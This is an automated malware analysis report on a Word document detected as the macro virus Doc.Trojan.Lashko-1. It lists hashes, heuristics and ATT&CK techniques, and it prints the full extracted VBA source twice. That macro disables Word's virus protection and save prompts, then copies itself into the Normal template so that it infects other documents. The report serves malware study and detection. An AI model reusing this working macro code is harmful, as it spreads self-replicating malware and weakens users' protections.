Office (OLE) malware analysis — malicious · 1f173f9cf83301c3

MALICIOUS

Office (OLE)

32.5 KB Created: 2000-01-09 17:07:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 0f3403c03c1258c9187683c4c0c46985 SHA-1: 17fb5246cfcc9ba7642e6a2efe976a7cb6f1cc07 SHA-256: 1f173f9cf83301c3cf7249afd0d98d64d46cafc581947533ddae0ba653f0ed2b

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro appears to copy its own code into the Normal template and then save the active document, a common technique for establishing persistence or ensuring the macro runs on subsequent document openings. The macro is identified as 'Doc.Trojan.Lashko-1' by ClamAV, suggesting a known malicious pattern.

Heuristics 3

ClamAV: Doc.Trojan.Lashko-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Lashko-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1145 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1145 bytes
SHA-256: `e0677c072fb90c3a39cbf1b25ad9af60d686a322c9c7a6c7f535c31515f61ade`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next With Options .VirusProtection = G .ConfirmConversions = G .SaveNormalPrompt = G G = False End With Set gt56 = NormalTemplate.VBProject: kj87 = gt56.VBComponents(1).CodeModule.CountOfLines Set xc24 = ActiveDocument.VBProject: sd12 = xc24.VBComponents(1).CodeModule.CountOfLines If kj87 < sd12 Then lashko_pa = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, sd12) NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, lashko_pa Else If sd12 < kj87 Then lashko_pn = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, kj87) ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, lashko_pn End If ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument 'WM2000\WM97 Lashko.p by eAx `99 'Greeetz! End If End Sub

SHA-256: e0677c072fb90c3a39cbf1b25ad9af60d686a322c9c7a6c7f535c31515f61ade

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
With Options
.VirusProtection = G
.ConfirmConversions = G
.SaveNormalPrompt = G
G = False
End With
Set gt56 = NormalTemplate.VBProject: kj87 = gt56.VBComponents(1).CodeModule.CountOfLines
Set xc24 = ActiveDocument.VBProject: sd12 = xc24.VBComponents(1).CodeModule.CountOfLines
If kj87 < sd12 Then
lashko_pa = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, sd12)
NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, lashko_pa
Else
If sd12 < kj87 Then
lashko_pn = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, kj87)
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, lashko_pn
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
'WM2000\WM97 Lashko.p by eAx `99
'Greeetz!
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.